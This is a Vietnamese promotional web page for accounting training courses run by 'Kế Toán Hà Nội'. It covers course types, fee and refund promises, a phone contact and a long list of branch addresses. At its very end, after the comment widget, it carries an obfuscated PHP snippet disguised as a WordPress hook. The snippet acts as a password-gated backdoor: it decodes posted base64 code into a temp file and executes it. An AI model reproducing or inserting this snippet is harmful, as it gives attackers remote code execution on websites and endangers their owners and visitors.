1

Học kế toán – học kế toán thực tế & học thực hành kế toán

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Xin chào!
Chúng tôi là KẾ TOÁN HÀ NỘI GROUP

Bạn đang muốn tìm khóa học nghiệp vụ kế toán tổng hợp với giáo viên là kế toán trưởng?
Bạn muốn học kế toán trên excel, học phần mềm kế toán và học đến khi bạn có thể tự quyết toán được Thuế và lên được BCTC cuối năm?
Bạn thuộc đối tượng nào thì chọn cho mình khóa học phù hợp ở phía dưới nhé.

– Bạn là người chưa biết gì về kế toán? chưa từng học kế toán bao giờ? hay đã học rồi nhưng không đi làm đúng ngành hoặc vì các lý do khác mà bây giờ muốn quay lại nhưng hầu như đã quên gần hết..?
Vậy thì mời bạn tham gia học lớp kế toán từ đầu nhé, để biết chi tiết nội dung khóa học hay học phí và thời gian học mời bạn ấn vào link: KHÓA KẾ TOÁN CHO NGƯỜI CHƯA BIẾT

– Bạn là người đã học kế toán rồi như sinh viên mới ra trường chưa có kinh nghiệm thực tế hay đang đi làm nhưng là không phải kế toán tổng hợp muốn học chuyên sâu để có thể đảm nhiệm cũng như đổi vị trí kế toán cao hơn trong công ty và có thu nhập tốt hơn thì mời bạn tham gia khóa kế toán chuyên sâu nhé, để biết chi tiết nội dung khóa học hay học phí và thời gian học mời bạn ấn vào link: KHÓA KẾ TOÁN CHO NGƯỜI ĐÃ BIẾT

– Còn bạn là đối tượng là chủ doanh nghiệp chưa biết gì về kế toán muốn học để về làm cho chính công ty hay chỉ để quản lý khi bạn nhìn hồ sơ sổ sách kế toán làm cho biết được họ làm đúng làm đủ làm sai… hay bạn muốn học gia sư  kế toán 1 kèm 1 với chính chứng từ của bạn và theo đúng phần hành bạn đang đi làm thì trung tâm cũng có những lớp như vậy cho bạn nhé.

Tại sao bạn nên chọn KẾ TOÁN HÀ NỘI là địa chỉ cuối cùng bạn muốn tham gia khi tìm trên mạng thì có quá nhiều trung tâm?

Bởi vì:

 1. Chúng tôi là 1 TẬP ĐOÀN chứ không phải trung tâm nhỏ lẻ, chúng tôi đã có 15 năm kinh nghiệm về đào tạo kế toán thực hành, phủ sóng khắp các miền trên toàn Quốc với hơn 40 cơ sở ở Hà Nội – tp. HCM và khắp các tỉnh thành lớn. Và đã là một TẬP ĐOÀN thì luôn luôn lớn mạnh và có tốt có chất lượng trao đi được sự tin yêu với mỗi học viên đến thì với phát triển mạnh như vậy được đúng không ạ.
 2. Chúng tôi nói đi đôi với làm, nói được làm được. Chất lượng đào tạo giảng dạy luôn đặt lên hàng đầu, sau đến chất lượng phục vụ – tư vấn – hỗ trợ dài lâu cả sau khi kết thúc. Đội ngũ kế toán trưởng trên 10 năm kinh nghiệm trực tiếp cầm tay chỉ việc, tài liệu học đều là chứng từ hóa đơn sống lấy ra vì đi đôi với đào tạo là làm dịch vụ kế toán mọi loại hình doanh nghiệp công ty nên học viên đi học như đi làm. Học theo những thông tư nghị định mới nhất mà bộ tài chính hành.
 3. Học viên đăng ký được xếp lịch ngay không phải chờ đợi lớp, xếp lớp đúng theo nhu cầu của từng đối tượng không xếp học xen kẽ. Dạy tận tình KHÔNG GIỚI HẠN SỐ BUỔI HỌC THỰC HÀNH – HỌC ĐẾN KHI THÀNH THẠO, cuối khóa phần nào chưa vững vẫn dạy thêm mà không phát sinh phí. Lịch học linh động cho học viên chọn và đổi nếu muốn: ca sáng-chiều-tối học 3 buổi 1 tuần theo lịch 2-4-6 hoặc 3-5-7 có ca chủ nhật phù hợp cho mọi nhu cầu đối tượng học.
 4. Học phí luôn phù hợp nhất và tốt nhất kể cả cho đối tượng Sinh Viên cũng có thể tham gia. Hiện tại học phí đang ƯU ĐÃI CAO NHẤT TRONG NĂM nhé nên các bạn hãy đăng ký học đi ạ. Và học phí không bao giờ phát sinh, học phí ưu đãi cũng bao gồm hết tài liệu và cả chứng chỉ kế toán cấp cuối khóa rồi nhé. Để biết rõ học phí của từng khóa và ưu đãi học phí thì mời bạn ấn vào link: học phí kế toán thực tế
  – Nhiều bạn hỏi có lớp cho chúng em học thử không, chỗ khác cho học thử mà tại sao bên mình không cho học thử để biết dạy có tốt như nói không , học thử nếu tốt em sẽ đóng học phí ngay?? thì xin thưa với các bạn là CHÚNG TÔI KHÔNG CÓ LỚP HỌC THỬ nhé bởi vì sao ạ, vì có quá nhiều bạn đã học ở nơi khác đến và phản ánh là em ham học thử tại kia lúc học thử thì giáo viên nhiệt tình lắm dạy tốt lắm nhưng sau học chính vài buổi thì đổi giáo viên rồi học linh tinh người chưa biết học cùng người đã biết không như lúc học thử. Vậy nên để tránh trường hợp như vậy ngay từ khi thành lập chúng tôi chúng chưa bao giờ có lớp học thử mà học viên muốn tham gia phải đăng ký nộp trước một phần học phí và cam kết: HỌC 1-2 BUỔI THẤY CHẤT LƯỢNG KHÔNG HÀI LÒNG ĐƯỢC RÚT LẠI HỌC PHÍ.

Chúng tôi luôn cam kết : ĐÃ HỌC LÀ THÀNH THẠO – KHÔNG THÀNH THẠO TRẢ LẠI HỌC PHÍ
Còn bạn nào chưa biết về KẾ TOÁN HÀ NỘI và đang băn thắc mắc KẾ TOÁN HÀ NỘI CÓ TỐT KHÔNG thì mời bạn tham khảo tại đây nhé: KẾ TOÁN HÀ NỘI – NƠI HỘI TỤ TINH HOA KẾ TOÁN

– Nếu bạn đã mất công đọc đến đây và tham khảo cặn kẽ thì còn chần chừ gì mà không đăng ký cho mình một khóa kế toán hữu ích tại trung tâm.

Liên hệ ngay với mình0973.761.751 (mình 30 tuổi) tư vấn viên vui tính nhiệt tình 🙂

Gọi ngay để được tư vấn cụ thể về nội dung học, lịch khai giảng và ưu đãi học phí

+ Bạn cũng có thể nhắn tin cho tôi với cú pháp ” tôi cần tư vấn về lớp kế toán thực tế” mình sẽ gọi lại để tư vấn ngay cho bạn, bạn nào chưa nghe tư vấn ngay lúc đó được thì nhắn “tôi cần tư vấn về lớp kế toán thực tế tư vấn cho tôi sau (mấy giờ?)” tôi hứa sẽ không làm ảnh hưởng đến bạn.
+ Và lựa chọn cuối bạn có thể trở về ngay Fanpage FB inbox trực tiếp với tôi 24/7 để được hỗ trợ theo link: khu vực HCM – KẾ TOÁN TPHCM khu vực HÀ NỘI – HỌC NGHIỆP VỤ KẾ TOÁN TẠI KẾ TOÁN HÀ NỘI

————————————————————–
Trụ sở đào tạo của KẾ TOÁN HÀ NỘI:
CƠ SỞ ĐÀO TẠO TẠI HÀ NỘI:
CS1: Lê Trọng Tấn – Thanh Xuân – Hà Nội.
CS2: Lê Đức Thọ – Từ Liêm – Hà Nội.
CS3: KĐT Việt Hưng – Long Biên – Hà Nội.
CS4: Quang Trung – Hà Đông – Hà Nội.
CS5: Minh Khai – Hoàng Mai – Hà Nội
CS6: Nguyễn Chí Thanh – Đống Đa – Hà Nội
CS7: Cổ Bi – Gia Lâm – Hà Nội
CƠ SỞ ĐÀO TẠO TẠI PHÍA BẮC:
CS1: Trần Hưng Đạo – Phố Kim Đồng – Tp. Thái Bình.

CS2: Trần Nguyên Hãn – P. Thọ Xương – Tp. Bắc Giang.
CS3: Chu Văn An – Hoàng Văn Thụ –  Tp. Thái Nguyên.
CS4: Giải Phóng – Tp. Nam Định.
CS5: Lê Văn Thịnh – Tp. Bắc Ninh.
CS6: Kênh Dương – p Kênh Dương – Tp. Hải Phòng.
CS7: Chu Văn An – Vĩnh Yên – Vĩnh Phúc.
CS8: Đoàn Nhữ Hải – p Quang Trung – Hải Dương
CS9: Nguyễn Văn Cừ – TP Hạ Long – Quảng Ninh.
CS10: Tràng An – p Tân Thành – tp Ninh Bình.
CƠ SỞ ĐÀO TẠO TẠI MIỀN TRUNG VÀ MIỀN NAM:
CS1: Lê Văn Chí – p. Linh Chiểu – q. Thủ Đức HCM
CS2: Đường CMT8 – Quận 3 HCM
CS3: Vân Côi, phường 7, q. Tân Bình HCM
CS4: Nguyễn Văn Vịnh, q. Tân Phú HCM
CS3: Hoàng Hoa Thám, p. Hiệp Thành, tp. Thủ Dầu 1 (Bình Dương)
CS4: Trương Định, p. An Cư, q. Ninh Kiều, tp Cần Thơ
CS5: Đường Trần Hưng Đạo, tp Long Xuyên, tỉnh An Giang
CS6: Thái Sanh Hạnh, KP6, p.9, tp Mỹ Tho, tỉnh Tiền Giang
CS7: Nguyễn Du, Phường 1, tp Vũng Tàu
CS8: Hà Huy Giáp, phường Quyết Thắng, TP. Biên Hòa, Đồng Nai
Nghệ An – Hà Tĩnh – Đà Nẵng –  Bến Tre – Bạc Liêu – Vĩnh Long – Kiên Giang – Cà Mau – Trà Vinh

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}